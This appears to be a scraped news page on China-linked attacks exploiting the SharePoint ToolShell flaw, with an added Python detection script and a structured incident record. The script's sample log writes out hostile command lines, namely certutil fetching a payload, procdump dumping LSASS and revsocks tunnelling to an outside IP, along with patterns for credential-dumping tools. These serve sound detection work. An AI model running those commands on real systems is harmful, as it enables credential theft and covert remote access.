European Finance Company and Middle Eastern Government Department: China-linked hackers exploit ToolShell to hit telecom, government networks globally

Chinese Threat Actors Exploit Zero-Day ToolShell Vulnerability in Global Cyber Espionage Campaign

New research from Symantec reveals that China-linked threat actors exploited the recently patched ToolShell vulnerability (CVE-2025-53770) to breach a telecommunications company in the Middle East and government agencies across Africa and South America in July 2025. The attacks began within days of Microsoft releasing patches, illustrating how quickly state-backed operators weaponize newly disclosed flaws.

The campaign involved the deployment of Zingdoor, a Go-based HTTP backdoor previously attributed to the China-linked group Glowworm (Earth Estries/FamousSparrow), and KrustyLoader, a Rust-written loader linked to UNC5221, another China-nexus actor. Additional victims included a state technology agency in Africa, a Middle Eastern government department and a European finance company. The attackers also used ShadowPad, a modular Trojan shared among several Chinese groups, and Sliver, an open-source command-and-control framework frequently abused for post-exploitation.

ToolShell is a critical deserialization flaw in on-premises SharePoint Server that allows unauthenticated remote code execution and full control of the server. Microsoft confirmed that at least three China-based groups, Budworm (Linen Typhoon), Sheathminer (Violet Typhoon) and Storm-2603, exploited the vulnerability, with Storm-2603 deploying Warlock ransomware in some intrusions. A related path traversal (spoofing) bug, CVE-2025-53771, was patched at the same time.

The attackers used a mix of living-off-the-land binaries (LOLBins) and publicly available tools, including:

  • Certutil (downloading payloads and decoding base64-encoded files)
  • GoGo Scanner (automated network and service scanning)
  • Revsocks (reverse SOCKS5 tunnel that pivots through the perimeter firewall)
  • Procdump/Minidump/LsassDumper (dumping LSASS memory to harvest credentials)
  • PetitPotam (CVE-2021-36942; coerces NTLM authentication from domain controllers over MS-EFSRPC for relay and lateral movement)
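
The tooling above is what a threat hunt should key on. The Python script below is an added example written for this page, not code from Symantec or the source article: it runs a small set of detection rules over constructed process-creation records (the `ts|host|parent image|image|command line` format is assumed here for illustration) and flags certutil download/decode, LSASS dumping with procdump/minidump-style tools, revsocks, and the SharePoint IIS worker (w3wp.exe) spawning a shell, which is the generic sign of a web server such as SharePoint having been turned into a code-execution primitive. Hostnames, paths and IP addresses in the sample records are made up, and the ATT&CK technique IDs are the editor's mapping.

```python
"""Hunt process-creation records for the LOLBin and tooling patterns listed
above. Added example: the record format and every sample line are constructed
for illustration, not taken from Symantec's or the source article's data."""
import re
from dataclasses import dataclass
from typing import Callable, List, Tuple


@dataclass
class ProcEvent:
    ts: str
    host: str
    parent: str    # full path of the parent image
    image: str     # full path of the new process
    cmdline: str


@dataclass
class Hit:
    rule: str
    technique: str   # ATT&CK technique ID (editor's mapping, not the source's)
    host: str
    cmdline: str


def _base(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}


def certutil_download(e: ProcEvent) -> bool:
    # certutil fetching or decoding a payload; plain -verify/-dump use is ignored
    return _base(e.image) == "certutil.exe" and bool(
        re.search(r"-urlcache|-decode|-encode", e.cmdline, re.I))


def lsass_dump(e: ProcEvent) -> bool:
    # procdump / minidump-style tools pointed at lsass
    blob = f"{e.image} {e.cmdline}"
    return bool(re.search(r"lsass", blob, re.I)) and bool(
        re.search(r"procdump|minidump|lsassdumper", blob, re.I))


def reverse_socks(e: ProcEvent) -> bool:
    return bool(re.search(r"revsocks", f"{e.image} {e.cmdline}", re.I))


def w3wp_spawns_shell(e: ProcEvent) -> bool:
    # The SharePoint IIS worker should never launch a command shell; when it
    # does, the web application has become a code-execution primitive.
    return _base(e.parent) == "w3wp.exe" and _base(e.image) in SHELLS


RULES: List[Tuple[str, str, Callable[[ProcEvent], bool]]] = [
    ("w3wp_spawns_shell", "T1505.003", w3wp_spawns_shell),
    ("certutil_download", "T1105", certutil_download),
    ("lsass_dump", "T1003.001", lsass_dump),
    ("reverse_socks", "T1090", reverse_socks),
]


def parse_line(line: str) -> ProcEvent:
    """Record format assumed for this example: ts|host|parent|image|cmdline."""
    ts, host, parent, image, cmdline = line.split("|", 4)
    return ProcEvent(ts, host, parent, image, cmdline)


def evaluate(e: ProcEvent) -> List[Hit]:
    return [Hit(name, tech, e.host, e.cmdline) for name, tech, pred in RULES if pred(e)]


def hunt(lines) -> List[Hit]:
    hits: List[Hit] = []
    for raw in lines:
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        hits.extend(evaluate(parse_line(line)))
    return hits


# Constructed sample records: one SharePoint host, four malicious events
# followed by two benign ones (certutil -verify, IIS starting its worker).
SAMPLE_LOG = r"""
# ts|host|parent_image|image|command_line
2025-07-21T10:14:02Z|SP01|C:\Windows\System32\inetsrv\w3wp.exe|C:\Windows\System32\cmd.exe|cmd.exe /c whoami
2025-07-21T10:15:40Z|SP01|C:\Windows\System32\cmd.exe|C:\Windows\System32\certutil.exe|certutil.exe -urlcache -split -f http://198.51.100.7/z.txt C:\ProgramData\z.txt
2025-07-21T10:22:11Z|SP01|C:\Windows\System32\cmd.exe|C:\ProgramData\procdump64.exe|procdump64.exe -accepteula -ma lsass.exe C:\ProgramData\l.dmp
2025-07-21T10:30:05Z|SP01|C:\Windows\System32\cmd.exe|C:\ProgramData\revsocks.exe|revsocks.exe -connect 198.51.100.7:443 -pass p
2025-07-21T11:00:00Z|SP01|C:\Windows\explorer.exe|C:\Windows\System32\certutil.exe|certutil.exe -verify cert.cer
2025-07-21T11:05:00Z|SP01|C:\Windows\System32\services.exe|C:\Windows\System32\inetsrv\w3wp.exe|w3wp.exe -ap SharePoint
"""

if __name__ == "__main__":
    for h in hunt(SAMPLE_LOG.splitlines()):
        print(f"[{h.technique}] {h.rule} on {h.host}: {h.cmdline}")
```

Run against the embedded sample, the script reports the four malicious events and nothing for the two benign lines. The parent/child rule is the one worth wiring into production first: it needs no tool names and catches whatever follows a SharePoint RCE, whereas the name-based rules are trivially evaded by renaming the binary.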

Symantec’s investigation found that malicious activity in the Middle Eastern telecom firm began on July 21, 2025, with attackers DLL-sideloading Zingdoor through a legitimate Trend Micro executable and later deploying KrustyLoader on July 25. The campaign’s breadth suggests mass scanning for vulnerable SharePoint servers, followed by targeted intrusions for espionage and persistent access.

While overlaps exist with Glowworm’s past operations, Symantec could not conclusively attribute the attacks to a single group, though all evidence points to China-based actors. The incidents underscore the global reach of state-sponsored cyber threats and the urgency of patching critical vulnerabilities even as attackers exploit them within days of disclosure.

Source: https://industrialcyber.co/ransomware/china-linked-hackers-exploit-toolshell-to-hit-telecom-government-networks-globally/

ETIS - The Community of Telecom Professionals cybersecurity rating report: https://www.rankiteo.com/company/etis-driving-collaboration-within-the-european-telecom-industry

Kaspersky Middle East cybersecurity rating report: https://www.rankiteo.com/company/kaspersky-lab-middle-east

"id": "ETIKAS1769561687",
"linkid": "etis-driving-collaboration-within-the-european-telecom-industry, kaspersky-lab-middle-east",
"type": "Cyber Attack",
"date": "7/2025",
"severity": "100",
"impact": "5",
"explanation": "Attack threatening the organization's existence"
{'affected_entities': [{'industry': 'Telecommunications',
                        'location': 'Middle East',
                        'name': 'Middle Eastern telecommunications company',
                        'type': 'Telecommunications'},
                       {'industry': 'Government',
                        'location': 'Africa',
                        'name': 'State technology agency in Africa',
                        'type': 'Government Agency'},
                       {'industry': 'Government',
                        'location': 'Middle East',
                        'name': 'Middle Eastern government department',
                        'type': 'Government Agency'},
                       {'industry': 'Finance',
                        'location': 'Europe',
                        'name': 'European finance company',
                        'type': 'Financial Institution'}],
 'attack_vector': 'Zero-day vulnerability (CVE-2025-53770) in on-premise '
                  'SharePoint servers',
 'data_breach': {'data_encryption': True,
                 'data_exfiltration': True,
                 'personally_identifiable_information': True,
                 'sensitivity_of_data': 'High',
                 'type_of_data_compromised': ['Credentials',
                                              'Sensitive government data',
                                              'Financial data']},
 'date_detected': '2025-07-21',
 'description': 'New research from Symantec reveals that China-linked threat '
                'actors exploited the recently patched ToolShell vulnerability '
                '(CVE-2025-53770) to breach a telecommunications company in '
                'the Middle East and government agencies across Africa and '
                'South America in July 2025. The attacks involved the '
                'deployment of Zingdoor, KrustyLoader, ShadowPad, and Sliver, '
                'with additional exploitation of a related path traversal bug '
                '(CVE-2025-53771). The campaign highlights the rapid '
                'weaponization of zero-day flaws by state-backed cyber '
                'operatives.',
 'impact': {'data_compromised': True,
            'identity_theft_risk': True,
            'operational_impact': 'Persistent access and lateral movement '
                                  'within compromised networks',
            'systems_affected': ['SharePoint servers',
                                 'Government systems',
                                 'Telecommunications infrastructure',
                                 'Financial systems']},
 'initial_access_broker': {'backdoors_established': ['Zingdoor',
                                                     'KrustyLoader',
                                                     'ShadowPad'],
                           'entry_point': 'ToolShell vulnerability '
                                          '(CVE-2025-53770)',
                           'high_value_targets': ['Government agencies',
                                                  'Telecommunications',
                                                  'Financial institutions']},
 'investigation_status': 'Ongoing',
 'lessons_learned': 'The rapid exploitation of zero-day vulnerabilities by '
                    'state-backed actors underscores the need for immediate '
                    'patching and proactive threat hunting.',
 'motivation': ['Espionage',
                'Persistent Access',
                'Financial Gain (Ransomware)'],
 'post_incident_analysis': {'corrective_actions': ['Patch management '
                                                   'prioritization for '
                                                   'critical vulnerabilities.',
                                                   'Enhanced detection for '
                                                   'LOLBin abuse and '
                                                   'post-exploitation '
                                                   'frameworks.',
                                                   'Improved network '
                                                   'segmentation and access '
                                                   'controls.'],
                            'root_causes': ['Unpatched zero-day vulnerability '
                                            '(CVE-2025-53770)',
                                            'Use of LOLBins for evasion and '
                                            'lateral movement']},
 'ransomware': {'data_encryption': True,
                'data_exfiltration': True,
                'ransomware_strain': 'Warlock'},
 'recommendations': ['Immediately patch critical vulnerabilities like '
                     'CVE-2025-53770 and CVE-2025-53771.',
                     'Monitor for unusual activity involving LOLBins and '
                     'publicly available tools like Sliver and Revsocks.',
                     'Implement network segmentation to limit lateral '
                     'movement.',
                     'Enhance monitoring for credential harvesting and data '
                     'exfiltration.'],
 'references': [{'source': 'Symantec'}, {'source': 'Microsoft'}],
 'response': {'third_party_assistance': 'Symantec'},
 'threat_actor': ['Glowworm (Earth Estries/FamousSparrow)',
                  'UNC5221',
                  'Budworm (Linen Typhoon)',
                  'Sheathminer (Violet Typhoon)',
                  'Storm-2603'],
 'title': 'Chinese Threat Actors Exploit Zero-Day ToolShell Vulnerability in '
          'Global Cyber Espionage Campaign',
 'type': ['Cyber Espionage', 'Ransomware'],
 'vulnerability_exploited': ['CVE-2025-53770 (ToolShell)',
                             'CVE-2025-53771 (Path Traversal)',
                             'CVE-2021-36942 (PetitPotam)']}